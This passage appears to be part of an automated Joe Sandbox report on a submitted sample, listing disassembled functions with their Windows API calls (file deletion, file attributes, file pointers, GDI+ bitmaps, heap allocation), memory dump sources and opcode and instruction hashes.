                        • Instruction ID: d3f29bb174b30e6117f4e2e85577d92ca68e5ad1c652b6749ea70acb835a42ff
                        • Opcode Fuzzy Hash: c262bebe98ec3f434561e8e2d07ebc39389de979b19e9ea6cc781b363adfaafa
                        • Instruction Fuzzy Hash: B7110A75940209ABDF14EFA8D9459EDB7B8FF08311F14802AF945F7251D7349A84CF68
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 001743AC
                        • DeleteFileW.KERNELBASE(000000FF,00000024,00173503,?,?,001732FA,?,?,B19080A7,?,?,0019FC52,000000FF), ref: 001743BF
                        • DeleteFileW.KERNEL32(?,000000FF,?,?,001732FA,?,?,B19080A7,?,?,0019FC52,000000FF), ref: 001743FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: DeleteFile$H_prolog3_
                        • String ID:
                        • API String ID: 3558260747-0
                        • Opcode ID: 66a1f2a5d86ab373a4a5fae61c5fb998322c891821173aa785e033d1a558013c
                        • Instruction ID: ad7cdc959fba77f14bc6f12223243ecd8f5061a2e7e33d1ded291acd020fd7d5
                        • Opcode Fuzzy Hash: 66a1f2a5d86ab373a4a5fae61c5fb998322c891821173aa785e033d1a558013c
                        • Instruction Fuzzy Hash: F7112871900219DBDF14EFA8D985AEEB7B8BF08311F14802AF805F7250DB349A84CBB4
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00174468
                        • GetFileAttributesW.KERNELBASE(?,00000024,00174458,?,0017478C,?,?,00000024,001742E9,?,00000001,00000000,?,?), ref: 0017447B
                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00000024), ref: 001744BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AttributesFile$H_prolog3_
                        • String ID:
                        • API String ID: 2559025557-0
                        • Opcode ID: d87a69ecc579909d2d66a8fccc52ccf5c802580802eb7dd6b89c861b89bed79f
                        • Instruction ID: 906ff89c4d23ac26b5bbfe9288eb1613dc5fa07f5ce33f2cc483d915e9809c5e
                        • Opcode Fuzzy Hash: d87a69ecc579909d2d66a8fccc52ccf5c802580802eb7dd6b89c861b89bed79f
                        • Instruction Fuzzy Hash: 88112E71D002089BCF04EFA8D989AEDB7B5FB48321F14852AF409F3351D7349A85CB68
                        APIs
                        • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 001739F7
                        • GetLastError.KERNEL32 ref: 00173A06
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer
                        • String ID:
                        • API String ID: 2976181284-0
                        • Opcode ID: 80f86f40945bf95fab469b95cd552fd2fab2dc2bec38d9ab051d2d8af1be0b93
                        • Instruction ID: 9ddc6adcbf3e78253c7fa70e8c6cb8952d254bfb49c799faa9f86024297f901a
                        • Opcode Fuzzy Hash: 80f86f40945bf95fab469b95cd552fd2fab2dc2bec38d9ab051d2d8af1be0b93
                        • Instruction Fuzzy Hash: EF4119716043459BD7249F64C4846BAB3F5FB89324F10C91DEAAD83241D7F0DE84AB61
                        APIs
                        • FlushFileBuffers.KERNEL32(?), ref: 00173C2C
                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00173CE0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: File$BuffersFlushTime
                        • String ID:
                        • API String ID: 1392018926-0
                        • Opcode ID: e2bcb59ad3a802a7e224abd2765be165bbb05b71ac4cb3024b82beebbee7af39
                        • Instruction ID: c526585906b85ec1dbbfc4d424aab4ef96e49273615c3bbc28f62ddda8e453e1
                        • Opcode Fuzzy Hash: e2bcb59ad3a802a7e224abd2765be165bbb05b71ac4cb3024b82beebbee7af39
                        • Instruction Fuzzy Hash: E321E631248245AFC716CF35C895AABBBF4AFA5704F08881EF4E993151D339EA0CE752
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00186B13
                        • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,001CAAAC), ref: 00186BE5
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FileH_prolog3_Operation_wcslen
                        • String ID:
                        • API String ID: 3104323202-0
                        • Opcode ID: 6ce47d9053945b09a3df59dba1ff1fa8f200873dc2384bb07c85ce87d4f8a39d
                        • Instruction ID: 6083e461971d1f7aa397f211bb2df1587be2ce3db127270389bafffb546a1942
                        • Opcode Fuzzy Hash: 6ce47d9053945b09a3df59dba1ff1fa8f200873dc2384bb07c85ce87d4f8a39d
                        • Instruction Fuzzy Hash: 6D310471D00208EADB15EFE9C996AECBBB4BF28354F54412EE409A7192EB305A45CF61
                        APIs
                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00173D37
                        • GetLastError.KERNEL32 ref: 00173D44
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorFileLastPointer
                        • String ID:
                        • API String ID: 2976181284-0
                        • Opcode ID: 904f9f44271173ab9687110d165edb510e5c277af386ec89057c9a9eb22d446f
                        • Instruction ID: f6279a8f520a272dd50ce7954d332be7acf276cfe35c51cb6e1239a183a64388
                        • Opcode Fuzzy Hash: 904f9f44271173ab9687110d165edb510e5c277af386ec89057c9a9eb22d446f
                        • Instruction Fuzzy Hash: E9110831604700ABD73596A8C940BA6B3F8EB45371FA08629E17BD25D0D770EE45E760
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00171A1D
                        • GetDlgItem.USER32(?,?), ref: 00171A35
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_Item_wcslen
                        • String ID:
                        • API String ID: 896027972-0
                        • Opcode ID: 3f1e9feca2711a857764e56467736fa71b41c07734528b1f40bf9174c29efa24
                        • Instruction ID: b9bb8ba00e5b2e47b996442272069258b3e36b6b68dee0106e617a32418aa84d
                        • Opcode Fuzzy Hash: 3f1e9feca2711a857764e56467736fa71b41c07734528b1f40bf9174c29efa24
                        • Instruction Fuzzy Hash: 9601F771A41304AFD714EF6CC892BEDB7F8AF64740F04400AF909A3191CB709E41CB50
                        APIs
                        • GdiplusShutdown.GDIPLUS(?,?,?,?,001A086E,000000FF), ref: 00186601
                        • OleUninitialize.OLE32(?,?,?,?,001A086E,000000FF), ref: 00186606
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: GdiplusShutdownUninitialize
                        • String ID:
                        • API String ID: 3856339756-0
                        • Opcode ID: 58255021fece6061f1584ba54caf933f3bf7b1613faa8ea347ccacb6ae19e7a5
                        • Instruction ID: 446e1a7472ba2fa86ba328b9c13ff31c20e62e5e05bb4eb19b2b0ff571d10087
                        • Opcode Fuzzy Hash: 58255021fece6061f1584ba54caf933f3bf7b1613faa8ea347ccacb6ae19e7a5
                        • Instruction Fuzzy Hash: F5F08276604604EFD701DB59EC05F4ABBF8FB49B20F004226F816C3B60DB34A880CB90
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_catch_wcslen
                        • String ID:
                        • API String ID: 1260878687-0
                        • Opcode ID: 4194e763630cf770e47e715cd1f8504d63a16d44f7b05623717675fa042b8e9e
                        • Instruction ID: d962944cc96dc25667d2a5fa2d604d4e9db75bd3339ad97cb591dbc7dae8965e
                        • Opcode Fuzzy Hash: 4194e763630cf770e47e715cd1f8504d63a16d44f7b05623717675fa042b8e9e
                        • Instruction Fuzzy Hash: 56F0FE7590011DABCF01FFA4D902AEF7BB8AF18300F204026B504B7141DB315B458FA5
                        APIs
                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0018593A
                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00185941
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: BitmapCreateFromGdipStream
                        • String ID:
                        • API String ID: 1918208029-0
                        • Opcode ID: 16ec5525d4c7e4a5d073f88bd94a475cfb70a5bd67d4a2787a74f89a5d431601
                        • Instruction ID: cc8610cf9f21a1422070813dabc3a9df16ef262e750d89a11be49cd9c9ab1375
                        • Opcode Fuzzy Hash: 16ec5525d4c7e4a5d073f88bd94a475cfb70a5bd67d4a2787a74f89a5d431601
                        • Instruction Fuzzy Hash: 32E0EDB1900318EFCB10EF58C541B9DBBE8FB05764F10805AE855A3601E370AF04EFA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ItemShowWindow
                        • String ID:
                        • API String ID: 3351165006-0
                        • Opcode ID: f325730c9daacbb3f0f02768fbcfb15d2d9d56a85cb4b6e7dd0b2c166238ecdf
                        • Instruction ID: ad4e24e5d81d373306853674fe4f35c7a7d561276e41f746a0e4606c584911eb
                        • Opcode Fuzzy Hash: f325730c9daacbb3f0f02768fbcfb15d2d9d56a85cb4b6e7dd0b2c166238ecdf
                        • Instruction Fuzzy Hash: F8C01232458200FECB014BB1DC09C2EBFA8ABA5212F18C908F0AAC1061C238C850DB91
                        APIs
                        • GetDlgItem.USER32(?,?), ref: 00171A06
                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00171A0D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CallbackDispatcherItemUser
                        • String ID:
                        • API String ID: 4250310104-0
                        • Opcode ID: b5b758718559274e963216fed8e0bbc897e77d37692df626bfde182d3a13d16c
                        • Instruction ID: 06e312707c7ed1da0612cc18061aee7da81d92d0813ba0eceb48bc7e33bcc45b
                        • Opcode Fuzzy Hash: b5b758718559274e963216fed8e0bbc897e77d37692df626bfde182d3a13d16c
                        • Instruction Fuzzy Hash: DEC04C76408240FFCB019BA69D18C2FFFA9AB95311F04C809F1AD80821C635C850DB51
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00181387
                          • Part of subcall function 00181D76: __EH_prolog3_GS.LIBCMT ref: 00181D7D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_
                        • String ID:
                        • API String ID: 2427045233-0
                        • Opcode ID: bd951b334dd2ed9b15592d1d74da19a12da1883d4cfac39ff1cb80493bd8b152
                        • Instruction ID: b2b6b4a392237d8ecd9ed73f8f4ae661fef95026f41175043a0b483bcb7893ad
                        • Opcode Fuzzy Hash: bd951b334dd2ed9b15592d1d74da19a12da1883d4cfac39ff1cb80493bd8b152
                        • Instruction Fuzzy Hash: 62415E71D00258ABCF25EFE9C8C5ADCBBB8BF59354F94806ED009A7251DB304A86CF11
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: __allrem
                        • String ID:
                        • API String ID: 2933888876-0
                        • Opcode ID: 85601d6f0b9176b9c8a5baf5e22cd01c2d064e4bb9c13a41ca3ca97244749833
                        • Instruction ID: 72fa437a8aeca60f5efbe498c3107ce484a5bc4454c63fd5792d7df888f1e8c8
                        • Opcode Fuzzy Hash: 85601d6f0b9176b9c8a5baf5e22cd01c2d064e4bb9c13a41ca3ca97244749833
                        • Instruction Fuzzy Hash: 35317435A012248BC706DF18AC58E2A3BB5FF98754B59402EE905D7771D730EC828B93
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_
                        • String ID:
                        • API String ID: 2427045233-0
                        • Opcode ID: 13bb1450ba16af977e45fd5d39796c5261d46d34ac33a07237e6c3393cba2601
                        • Instruction ID: b0244961cecfd965ae2b8e8fbaa0ea16da32d7a92d63e0504994d35ffdfbb9cf
                        • Opcode Fuzzy Hash: 13bb1450ba16af977e45fd5d39796c5261d46d34ac33a07237e6c3393cba2601
                        • Instruction Fuzzy Hash: 7A21D230640304ABDF20DEA4A842EFEB3B9AF62B40F508558F489A7182D7349E59C7A0
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0017F4F5
                          • Part of subcall function 00174C75: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174C9D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CloseFindH_prolog3_
                        • String ID:
                        • API String ID: 2672038326-0
                        • Opcode ID: e3fe578055cb98b6dc7115d5ebfdf3c6e07a0fa632cda4a9bb9bcdc140f87a22
                        • Instruction ID: 951ffced23a6e85f00e5e19f9b645e13c972ceb3f0b30c85e2bcb522a1101180
                        • Opcode Fuzzy Hash: e3fe578055cb98b6dc7115d5ebfdf3c6e07a0fa632cda4a9bb9bcdc140f87a22
                        • Instruction Fuzzy Hash: 12214F70E053189BDF19DFB8D9456AE7BB1BF19704F50803EE409A7352DB304A069F55
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_
                        • String ID:
                        • API String ID: 2427045233-0
                        • Opcode ID: 5e9974f9183714af965f40a80284775e07c95b0d39d773c1f0cd8e1a1c6ff080
                        • Instruction ID: 573dfe35db25dd0b2fda1769a5511a7efa857e1192281139e1529be2286b2259
                        • Opcode Fuzzy Hash: 5e9974f9183714af965f40a80284775e07c95b0d39d773c1f0cd8e1a1c6ff080
                        • Instruction Fuzzy Hash: 402142B1904108AEDB08EFA4D995EEE7BB9BF58300F54401AF505EB251D731AB85CB61
                        APIs
                          • Part of subcall function 001984D6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0019681A,00000001,00000364,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E), ref: 00198517
                        • _free.LIBCMT ref: 00199885
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: cad4fd7691973b889dac81a4565274e961a8517fcde5adeb8a615647a0e82bc5
                        • Instruction ID: 4e23a6d816716d6e1546a200eebc90735ef1be797a78bd4244d1d46451355e98
                        • Opcode Fuzzy Hash: cad4fd7691973b889dac81a4565274e961a8517fcde5adeb8a615647a0e82bc5
                        • Instruction Fuzzy Hash: 520126732003096BEB258F69D845D5AFBD8EF8A370F25062DE59587280EB30A805C674
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: H_prolog3_
                        • String ID:
                        • API String ID: 2427045233-0
                        • Opcode ID: c7c520b4a3678ea5d572e90ae140888c9a40f438b803cc1f09530a37a71c6d1b
                        • Instruction ID: f41d83b2d65787ff5f6d6c101490215aaf4e6e7a222815e31130972cf5aa6125
                        • Opcode Fuzzy Hash: c7c520b4a3678ea5d572e90ae140888c9a40f438b803cc1f09530a37a71c6d1b
                        • Instruction Fuzzy Hash: 3E016D70904108ABDB00FBE4CD96BDE77B8AF25315F448065F404AA182DB349788CB71
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0019681A,00000001,00000364,?,0018D656,?,?,?,00000000,?,0018C08A,0018C17E), ref: 00198517
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
